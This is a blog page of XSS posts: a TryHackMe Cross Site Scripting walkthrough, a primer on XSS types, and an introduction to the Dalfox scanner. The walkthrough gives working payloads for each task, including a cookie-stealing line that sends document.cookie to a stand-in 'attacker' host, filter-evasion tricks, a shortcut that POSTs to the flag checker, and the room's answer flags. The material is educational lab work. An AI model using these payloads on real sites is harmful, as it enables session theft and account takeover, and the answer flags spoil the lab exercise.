-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label xss. Show all posts
Showing posts with label xss. Show all posts
  • TryHackMe Cross Site Scripting - A Walkthrough by Kumar Atul Jaiswal





     

    [Task 1] Introduction



    Cross-site scripting (XSS) is a security vulnerability typically found in web applications. Its a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victims machine.


    A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. TryHackMe Cross Site Scripting - A Walkthrough by Kumar Atul Jaiswal


    The extent to the severity of this vulnerability depends on the type of XSS, which is normally split into two categories: persistent/stored and reflected. Depending on which, the following attacks are possible:


    • Cookie Stealing - Stealing your cookie from an authenticated session, allowing an attacker to login as you without themselves having to provide authentication.
    • Keylogging - An attacker can register a keyboard event listener and send all of your keystrokes to their own server.
    • Webcam snapshot - Using HTML5 capabilities its possible to even take snapshots from a compromised computer webcam.
    • Phishing - An attacker could either insert fake login forms into the page, or have you redirected to a clone of a site tricking you into revealing your sensitive data.
    • Port Scanning - You read that correctly. You can use stored XSS to scan an internal network and identify other hosts on their network.
    • Other browser based exploits - There are millions of possibilities with XSS.

    Who knew this was all possible by just visiting a web-page. There are measures put in place to prevent this from happening by your browser and anti-virus.


    This room will explain the different types of cross-Site scripting, attacks and require you to solve challenges along the way.


    This room is for educational purposes only, carrying out attacks explained in this room without permission from the target is illegal. I take no responsibility for your actions, you need to learn how an attacker can exploit this vulnerability in order to ensure you're patching it properly.

    [Task 2] Deploy your XSS Playground



    Attached to this task is a machine used for all questions in this room. Every task in this room has an page on the XSS Playground site, which includes a more in-depth explanation of the vulnerability in question and supporting challenges.








    [Task 3] Stored XSS


    Stored cross-site scripting is the most dangerous type of XSS. This is where a malicious string originates from the websites database. This often happens when a website allows user input that is not sanitised (remove the "bad parts" of a users input) when inserted into the database. 

    An example






    A attacker creates a payload in a field when signing up to a website that is stored in the websites database. If the website doesn't properly sanitise that field, when the site displays that field on the page, it will execute the payload to everyone who visits it.


    The payload could be as simple as <script>alert(1)</script>


    However, this payload wont just execute in your browser but any other browsers that display the malicious data inserted into the database.


    Lets experiment exploiting this type of XSS. navigate to the "Stored-XSS" page on the XSS playground.




    #1
    The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.



    #2 Add a comment and see if you can insert some of your own HTML.

    Doing so will reveal the answer to this question.


    Payload :- <p>HEY, it's HTML!!</p>

    Ans :- HTML_T4gs




    #3 Create an alert popup box appear on the page with your document cookies.

    Payload :- <script>alert(document.cookie)</script>

    Ans :- W3LL_D0N3_LVL2




    #4 Change "XSS Playground" to "I am a hacker" by adding comments and using Javascript.

    Payload :- <script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>



    Ans :- websites_can_be_easily_defaced_with_xss



    #5 Stored XSS can be used to steal a victims cookie (data on a machine that authenticates a user to a webserver). This can be done by having a victims browser parse the following Javascript code:

    <script>window.location='http://attacker/?cookie='+document.cookie</script>

    This script navigates the users browser to a different URL, this new request will includes a victims cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.

    Take over Jack's account by stealing his cookie, what was his cookie value?


    Payload :- <img src="javascript:'/log/' + document.cookie" />

    Ans :- s%3Aat0YYHmITnfNSF0kM5Ne-ir1skTX3aEU.yj1%2FXoaxe7cCjUYmfgQpW3o5wP3O8Ae7YNHnHPJIasE




    #6 Post a comment as Jack.


    ANs :- c00ki3_stealing



    [Task 4] Reflected XSS



    In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.


    This might seem harmless as it requires the victim to send a request containing an attackers payload, and a user wouldn't attack themselves. However, attackers could trick the user into clicking their crafted link that contains their payload via social-engineering them via email..


    Reflected XSS is the most common type of XSS attack.


    An example









    An attacker crafts a URL containing a malicious payload and sends it to the victim. The victim is tricked by the attacker into clicking the URL. The request could be http://example.com/search?keyword=<script>...</script>


    The website then includes this malicious payload from the request in the response to the user. The victims browser will execute the payload inside the response. The data the script gathered is then sent back to the attacker (it might not necessarily be sent from the victim, but to another website where the attacker then gathers this data - this protects the attacker from directly receiving the victims data).



    #1
    Craft a reflected XSS payload that will cause a popup saying "Hello"


    Payload :- <script>alert("Hello")</script>

    Ans :-  ThereIsMoreToXSSThanYouThink




    #2 Craft a reflected XSS payload that will cause a popup with your machines IP address.



    Payload :- <script>alert(window.location.hostname)</script>

    Ans :-  ReflectiveXss4TheWin




    [Task 5] DOM-Based XSS



    What is the DOM


    In a DOM-based XSS attack, a malicious payload is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. So what does this mean?

    With reflective xss, an attackers payload will be injected directly on the website and will not matter when other Javascript on the site gets loaded.


    <html>
        You searched for <em><script>...</script></em>
    </html

    With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:

    var keyword = document.querySelector('#search')
    keyword.innerHTML = <script>...</script>




    #1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.


    The hint gives us something to try out.


    test" onmouseover="alert('Hover over the image and inspect the image element')



    What this is doing is applying test to the src attribute of the image tag, and closing that quote. Then it is starting an onmouseover event attribute. When we do this and mouse over the broken image, then we see the alert.



    Let's modify it and make it do what the task is asking for (document.cookie instead of that string):


    xxx" onmouseover="alert(document.cookie)



    That should give us the desired result. We could have chosen a number of different events rather than onmouseover. I personally prefer onerror for this example. Give it a try!


    Ans :- BreakingAnElementsTag






    #2 Create an onhover event on an image tag, that change the background color of the website to red
    Almost the same deal here, except we are supposed to try using onhover instead, and change some property of the page instead of just displaying a popup.

    xxx" onhover="document.body.style.backgroundColor='red'

    You might have to play around with this one, it's a bit buggy for me. I had to end up doing it with an onmouseover I think. Play around and you'll eventually get it.


    Ans :- JavaScriptIsAwesome





    [Task 6] Using XSS for IP and Port Scanning


    Cross-site scripting can be used for all sorts of mischief, one being the ability to scan a victims internal network and look for open ports. If an attacker is interested in what other devices are connected on the network, they can use Javascript to make requests to a range of IP addresses and determine which one responds.


    On the XSS Playground, go to the IP/Port scanning tab and review a script to scan the internal network.




    [Task 7] XSS Keylogger


    Javascript can be used for many things, including creating an event to listen for key-presses.

    Navigate to the "Key Logger" part of the XSS playground and complete the challenge.





    [Task 8] Filter Evasion



    There are many techniques used to filter malicious payloads that are used with cross-site scripting. It will be your job to bypass 4 commonly used filters.


    Navigate to "Filter Evasion" in the XSS Playground to get started.


    Cross-site scripting are extremely common. Below are a few reports of XSS found in massive applications; you can get paid very well for finding and reporting these vulnerabilities. 



        XSS found in Shopify
        $7,500 for XSS found in Steam chat
        $2,500 for XSS in HackerOne
        XSS found in Instagram



    #1 Bypass the filter that removes any script tags.

    Payload :- <img src="blah" onerror=alert("Hello") />

    Ans :- 3c3cf8d90aaece81710ab9db759352c0




    #2 The word alert is filtered, bypass it.

    Payload :-  <img src="blah" onerror=confirm("Hello") />

    Ans :- a2e5ef66f5ff584a01d734ef5edaae91




    #3 The word hello is filtered, bypass it.

    Payload :-  <img src="blah" onerror=alert("HHelloello") />

    Ans :- decba45d0eff17c6eedf1629393bee1d





    #4 Filtered in challenge 4 is as follows:


        word "Hello"
        script
        onerror
        onsubmit
        onload
        onmouseover
        onfocus
        onmouseout
        onkeypress
        onchange


    Now it get's easier once we understand what this code is looking for! For this one, we just have to realize that the filter code sees onerror, but ignores ONERROR, which is still valid for our purposes.


    <img src="blah" ONERROR="alert('HHelloello')" />


    I'll let you in on a secret. This section is all being evaluated by POSTing values for question and answer to /filter-evasion-check. If you simply POST question=1&answer=Hello to /filter-evasion-check, you can fool the server-side code into returning the valid answer flag.


    POST question=1&answer=Hello
    POST question=2&answer=prompt
    POST question=4&answer=Hello
    POST question=4&answer=Hello


    Ans :-  2482d2e8939fc85a9363617782270555








    [Task 9] Protection Methods & Other Exploits



    Protection Methods

    There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.

        

    Escaping - Escape all user input. This means any data your application has received  is secure before rendering it for your end users. By escaping user input, key characters in the data received bu the web age will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.


    Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.


    Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;


    Other Exploits


    XSS is often overlooked but can have just as much impact as other big impact vulnerabilities. More often than not, its about stringing several vulnerabilities together to produce a bigger/better exploit. Below are some other interesting XSS related tools and websites.




    XSS-Payloads.com is a website that has XSS related Payloads, Tools, Documentation and more. You can download XSS payloads that take snapshots from a webcam or even get a more capable port and network scanner.






    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


  • Background concept about cross site scripting with examples







    Background Concept About Cross Site Scripting ( XSS ) With Examples



    Now we are going to talk about XSS cross site scripting. XSS Vulnerabilities are among the most wide spread wab application vulnerabilities on the internet. 


    Cross-site-scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicous code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur antwhere a web application uses input from a user within the output  it generates without validating or encoding it. Background concept about cross site scripting with examples



    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browsers has no way to kmow that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens or, other sensitive information retined by the browser and used with that site. cross site scripting with examples



    It's refer to client side injection attack where an attacker can execute malicious scripts into a legitimate website or web application.  By leavrging a cross site scipting, an attacker doesn't target the victim directly instead an attacker would exploit a vulnerability within a web applications or websites that the victim would visit essentially using the vulnerable website as a vehicle the deliver the malcious script to the victim's browser. basicallly we will use a website to deliver our payloads to the victime, when victim visit into that they paylaod are will executed and the payload will to our job, payload can be malicious, payload can be simple whatever. xss examples



    Let's talk about impact of XSS



    1) Cookie theft
    2) Keylogging
    3) Phishing
    4) URL Redirection



    cross site scripting can be used to a part of URL redirection. Cookies stealing, Keylogging, Phishing etc.


    so, in order to run our javascript malicious script in a victim's browser, an attacker must first find a way to inject a payload into web page. That's the victim visit. 


    for exploitation, attacker can used social engineering way such as email, click jacking to manipulate user for executation to our payload.



    Let's talk about the Types of XSS...



    Mainly cross site scriptings are parts of three types :-


    1) Reflected XSS
    2) Stored XSS
    3) DOM-based XSS




    Reflected XSS or  Stored XSS 

    It's a most common types of Cross site scripting, attacker payload script has to be part of the request which is send to the website an reflect back in such as a way that the HTTP response includes that the payload.

    so, basically reflected cross site scripting are required client site interaction, if user will visit that the vulnerable web page and server will deliver our paylaod to the users browse here, then user stored this but server want any payload,we will deliver our paylaod to the client browser and if client visiting that then there's a client side attacks. sql injection cheatsheet




    DOM Based XSS :-

    it's a advance type of cross site scripting attack, which be made possibly when the web application client site scripting writes user provides a data into a document objects model. The Most dangerous parts of this attack is client side attacks. how to prevent from sql injection


    In the attacker's payload is never sent to the server, this makes it will more to detect web application firewall and security engineers.


    so basically let's take example of Reflected, stored and DOM through practially,




    This is a website testphp.vulnweb.com


    So we will type something in the search box like Hello or HackingTruth.in and hit go button...









    so it's a reflected but not stored, it's not storing..
    so there may be reflected cross site scripting.



    Now. let's click on the signup option and you can try withlogin based application and if i will give a any text like kumaratuljaiswal.in









    DOM XSS



    if i will give any parameter like hello

    paramter=hello


    <script></script>


    and just executing to the user's context, nor the server side to the sever application, then there may be DOM based...



    Example this


    prompt.mI/O


    this is not sending to the server there are executing to the our context, if i will give anypayload there and it will execute then this is called DOM based scripting. cross site scripting how to prevent


    see this








    so just only executing on the user's script, nor the server side  nor to the client side.




    How to Hunt for XSS ?


    • Find a Input parameter, Give any input there and not senitizer then If your input reflect or stored any where there may be XSS.
    • Try to execute any javascript code there, if you succeed to execute any javascript then there is a XSS
    • Exploitation of XSS.



    you'll find a input parameter then give input there , if your input reflect or stored anywhere there may be cross site scripting. cross site scripting example



    XSS Cheatsheet Here :- Click Here 



    I hope its clear to about The Background concept of cross site scripting :-)



    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :-  SooN

     


    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)





  • XSS vulnerability search in any website within minutes





    So today we will know about the open source tool that helps in finding XSS cross site scripting attack for any website. This tool is scripted in go language as you can tell -_- you can help us by subscribing to our youtube channel :. Kumar Atul Jaiswal .: before using the too.



    XSS Vulnerability


    Cross-site scripting ( XSS )is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.  XSS Vulnerability find in any website within minutes
    XSS vulnerability search in any website within minutes



    Dalfox


    Just, XSS Scanning and Parameter Analysis tool. I previously developed XSpear, a ruby-based XSS tool, and this time, a full change occurred during the process of porting with golang!!! and created it as a new project. The basic concept is to analyze parameters, find XSS, and verify them based on DOM Parser.

    I talk about naming. Dal(달) is the Korean pronunciation of moon and fox was made into Fox(Find Of XSS). XSS Vulnerability find in any website within minutes

    Key features



    • Paramter Analysis (find reflected parameter, find free/bad characters, Identification of injection point)
    • Static Analysis (Check Bad-header like CSP, X-Frame-optiopns, etc.. with base request/response base)
    • Optimization query of payloads
    •         Check the injection point through abstraction and generated the fit  payload.
    •         Eliminate unnecessary payloads based on badchar

    • XSS Scanning(Reflected + Stored) and DOM Base Verifying
    • All test payloads(build-in, your custom/blind) are tested in parallel with the encoder.
    •         Support to Double URL Encoder
    •         Support to HTML Hex Encoder


    • Friendly Pipeline (single url, from file, from IO)
    • And the various options required for the testing :D
    •         built-in / custom grepping for find other vulnerability
    •         if you found, after action
    •         etc..


    How To Install ?


    There are a total of three ways to Personally, I recommend go install.


    1) clone this repository

    git clone https://github.com/hahwul/dalfox



    XSS vulnerability search in any website within minutes



    ls

    cd dalfox 

    ls




    https://www.hackingtruth.in/2020/06/xss-vulnerability-find-in-any-website.html





    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :- 

     

     

             





  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.